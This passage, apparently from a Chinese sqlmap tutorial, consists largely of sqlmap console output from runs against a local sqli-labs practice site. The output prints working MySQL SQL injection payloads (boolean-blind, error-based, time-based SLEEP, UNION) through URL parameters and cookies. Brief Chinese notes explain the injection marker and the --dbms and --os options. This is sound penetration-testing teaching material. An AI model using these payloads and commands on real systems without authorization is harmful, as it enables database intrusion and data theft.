[20:33:26] [INFO] testing if URI parameter '#1*' is dynamic
[20:33:26] [INFO] URI parameter '#1*' appears to be dynamic
[20:33:26] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:33:26] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:33:26] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:33:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:33:28] [WARNING] reflective value(s) found and filtering out
[20:33:28] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:33:28] [INFO] testing 'Generic inline queries'
[20:33:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:33:28] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:33:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:33:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:28] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:33:28] [INFO] testing 'MySQL inline queries'
[20:33:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:33:28] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:33:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:33:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:33:39] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:33:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:33:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:33:39] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:33:39] [INFO] target URL appears to have 3 columns in query
[20:33:39] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND 6632=6632 AND 'YYeb'='YYeb
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 4244 FROM(SELECT COUNT(*),CONCAT(0x7176786271,(SELECT (ELT(4244=4244,1))),0x7178786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mGsy'='mGsy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 1332 FROM (SELECT(SLEEP(5)))sgvg) AND 'BhGb'='BhGb
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=-9618' UNION ALL SELECT NULL,NULL,CONCAT(0x7176786271,0x586f6d53686f797063544e70586866436d4b68544670504a415a674f675176744174494f7364754e,0x7178786271)-- -
---
[20:33:55] [INFO] the back-end DBMS is MySQL
[20:33:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:33:56] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 20:33:56 /2020-02-29/
'us' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
uname: unknown option -- banner
Try 'uname --help' for more information.
在默认情况下不会对URI中的参数进行测试,加了 * 进行标记后会进行测试。
加入cookie再次测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-20/?id=1 --cookie="uname=admin*" --banner
打印
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:37:34 /2020-02-29/
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q]
[20:37:36] [INFO] testing connection to the target URL
[20:37:36] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:37:36] [INFO] testing if the target URL content is stable
[20:37:36] [INFO] target URL content is stable
[20:37:36] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n]
[20:37:37] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be dynamic
[20:37:37] [INFO] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might be injectable (possible DBMS: 'MySQL')
[20:37:37] [INFO] heuristic (XSS) test shows that (custom) HEADER parameter 'Cookie #1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:37:37] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:37:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:37:39] [WARNING] reflective value(s) found and filtering out
[20:37:39] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Login")
[20:37:39] [INFO] testing 'Generic inline queries'
[20:37:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:37:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:37:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:37:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:37:40] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:37:40] [INFO] testing 'MySQL inline queries'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:37:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:37:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:37:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:37:50] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:37:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:37:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:37:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:37:50] [INFO] target URL appears to have 3 columns in query
[20:37:50] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[20:38:00] [INFO] testing if GET parameter 'id' is dynamic
[20:38:01] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:38:01] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:38:01] [INFO] testing for SQL injection on GET parameter 'id'
[20:38:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:38:01] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:38:01] [INFO] testing 'Generic inline queries'
[20:38:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:38:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:38:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:38:05] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:38:06] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:38:08] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:38:10] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:38:11] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:38:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:38:16] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:38:17] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:38:17] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[20:38:18] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[20:38:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:38:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:38:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:38:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:38:22] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:38:23] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:38:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:27] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:38:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:38:30] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:38:31] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:38:32] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[20:38:34] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[20:38:34] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[20:38:35] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[20:38:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:38:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:38:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[20:38:35] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[20:38:35] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[20:38:36] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[20:38:36] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL inline queries'
[20:38:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:38:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:38:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:38:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:38:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:38:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:38:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:38:42] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[20:38:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[20:38:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[20:38:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[20:38:45] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[20:38:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[20:38:47] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[20:38:47] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:38:50] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[20:38:51] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[20:38:51] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[20:38:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[20:38:53] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[20:38:54] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[20:38:55] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[20:38:56] [INFO] testing 'MySQL AND time-based blind (ELT)'
[20:38:57] [INFO] testing 'MySQL OR time-based blind (ELT)'
[20:38:58] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[20:38:59] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[20:38:59] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:39:01] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[20:39:02] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[20:39:02] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[20:39:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:39:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:39:23] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[20:39:32] [WARNING] GET parameter 'id' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3431 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: uname=admin' AND 3447=3447 AND 'KGyg'='KGyg
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=admin' AND (SELECT 3589 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(3589=3589,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xcai'='xcai
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin' AND (SELECT 2216 FROM (SELECT(SLEEP(5)))rUMt) AND 'oohs'='oohs
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: uname=-9826' UNION ALL SELECT CONCAT(0x717a6b6a71,0x5251674f4156424d73766576455768497757664846575255634647565852644255516a63674d4256,0x7171787071),NULL,NULL-- -
---
[20:39:32] [INFO] the back-end DBMS is MySQL
[20:39:32] [INFO] fetching banner
[20:39:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:39:32] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 20:39:32 /2020-02-29/
*标记也可以用于–user-agent和–proxy等参数中。
四、sqlmap注入参数
1.sqlmap强制设置DBMS
默认情况下sqlmap会自动识别探测目标web应用程序的后端数据库管理系统(DBMS),sqlmap支持的DBMS种类有:
- MySQL
- Oracle
- PostgreSQL
- Microsoft SQL Server
- Microsoft Access
- Firebird
- SQLite
- Sybase
- SAP MaxDB
- DB2
可以通过参数来指定数据库来进行探测:
参数:
--dbms 数据库类型
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbms mysql --banner
打印
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:40:41 /2020-03-01/
[09:40:42] [INFO] testing connection to the target URL
[09:40:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:40:42] [INFO] testing if the target URL content is stable
[09:40:42] [INFO] target URL content is stable
[09:40:42] [INFO] testing if GET parameter 'id' is dynamic
[09:40:42] [INFO] GET parameter 'id' appears to be dynamic
[09:40:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:40:42] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:40:42] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[09:40:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:40:51] [WARNING] reflective value(s) found and filtering out
[09:40:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[09:40:51] [INFO] testing 'Generic inline queries'
[09:40:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:40:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:40:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:40:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:40:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:40:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:40:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:40:52] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:40:52] [INFO] testing 'MySQL inline queries'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:40:52] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:40:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:40:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:41:02] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:41:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:41:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:41:02] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:41:02] [INFO] target URL appears to have 3 columns in query
[09:41:02] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7504=7504 AND 'BNEG'='BNEG
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 9479 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9479=9479,1))),0x7171627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XPIc'='XPIc
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8767 FROM (SELECT(SLEEP(5)))trYN) AND 'UXYA'='UXYA
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8306' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707671,0x587572745246476f63786f6b6243456b66724b69784c66657866526f56457775726774675a787672,0x7171627871)-- -
---
[09:41:21] [INFO] the back-end DBMS is MySQL
[09:41:21] [INFO] fetching banner
[09:41:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[09:41:21] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:41:21 /2020-03-01/
2.sqlmap强制设置OS系统
默认情况下sqlmap会自动探测目标web应用程序的后端操作系统,sqlmap完全支持的OS种类Linux、Windows。
可以通过参数来指定探测的操作系统:
参数:
--os 系统类型
测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbms mysql --os windows --banner
打印
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:42:55 /2020-03-01/
[09:42:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7504=7504 AND 'BNEG'='BNEG
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 9479 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9479=9479,1))),0x7171627871,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'XPIc'='XPIc
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8767 FROM (SELECT(SLEEP(5)))trYN) AND 'UXYA'='UXYA
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8306' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707671,0x587572745246476f63786f6b6243456b66724b69784c66657866526f56457775726774675a787672,0
x7171627871)-- -
---
[09:42:56] [INFO] testing MySQL
[09:42:56] [INFO] confirming MySQL
[09:42:56] [INFO] the back-end DBMS is MySQL
[09:42:56] [INFO] fetching banner
[09:42:56] [INFO] the back-end DBMS operating system is Windows
back-end DBMS operating system: Windows
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.26'
[09:42:56] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 09:42:56 /2020-03-01/
再次测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --os linux --banner
打印
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:45:48 /2020-03-01/
[09:45:48] [INFO] testing connection to the target URL
[09:45:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:45:48] [INFO] testing if the target URL content is stable
[09:45:49] [INFO] target URL content is stable
[09:45:49] [INFO] testing if GET parameter 'id' is dynamic
